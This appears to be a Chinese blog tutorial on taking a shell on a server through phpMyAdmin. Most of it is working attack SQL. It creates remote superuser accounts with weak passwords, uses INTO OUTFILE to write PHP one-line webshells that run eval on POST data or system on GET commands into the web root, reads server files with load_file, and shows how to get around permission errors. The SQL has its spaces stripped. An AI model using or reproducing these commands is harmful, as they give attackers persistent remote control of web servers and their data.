这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

PHPmyadmin修改用户密码

直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可

添加超级用户guetsec密码ooxx并且允许外连

GRANTALLPRIVILEGESON*.*TO'guetsec'@'%'IDENTIFIEDBY'ooxx'WITHGRANTOPTION;

我们可以创建root账户设置密码

GRANTALLPRIVILEGESON*.*TO'root'@'%'IDENTIFIEDBY'123456'WITHGRANTOPTION;

这样就创建了root外联账户,密码123456,外链时用123456

拿shell四种经典方法:

方法一:

CREATETABLE`mysql`.`study`(`7on`TEXTNOTNULL);INSERTINTO`mysql`.`study`(`7on`)VALUES('<?php@eval_r($_POST[7on])?>');SELECT7onFROMstudyINTOOUTFILE'E:/wamp/www/7.php';----以上同时执行,在数据库:mysql下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php一句话连接密码:7on

方法二:

读取文件内容:selectload_file('E:/xamp/www/s.php');写一句话:select'<?php@eval_r($_POST[cmd])?>'INTOOUTFILE'E:/xamp/www/study.php'cmd执行权限:select'<?phpecho\'<pre>\';system($_GET[\'cmd\']);echo\'</pre>\';?>'INTOOUTFILE'E:/xamp/www/study.php'

方法三:

JhackJ版本 PHPmyadmin拿shell

CreateTABLEstudy(cmdtextNOTNULL);InsertINTOstudy(cmd)VALUES('<?phpeval_r($_POST[cmd])?>');selectcmdfromstudyintooutfile'E:/wamp/www/7.php';DropTABLEIFEXISTSstudy;<?phpeval_r($_POST[cmd])?>--------------------------------------------------------------------------------<?php@eval_r($_POST[cmd])?>CREATETABLEstudy(cmdtextNOTNULL);#MySQL返回的查询结果为空(即零行)。INSERTINTOstudy(cmd)VALUES('<?phpeval_r($_POST[cmd])?>');#影响列数:1SELECTcmdFROMstudyINTOOUTFILE'E:/wamp/www/7.php';#影响列数:1DROPTABLEIFEXISTSstudy;#MySQL返回的查询结果为空(即零行)。

方法四:

selectload_file('E:/xamp/www/study.php');select'<?phpecho\'<pre>\';system($_GET[\'cmd\']);echo\'</pre>\';?>'INTOOUTFILE'E:/xamp/www/study.php'

然后访问网站目录:http://www.2cto.com/study.php?cmd=dir

Phpmyadmin导出一句话时出现(Errcode: 13 - Permission denied)

是对此目录没有权限,可以试试上级目录,或者下级目录

再不行试试NTS引流

还有就是注意目录\

关于“PHPmyadmin拿shell的方法有哪些”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。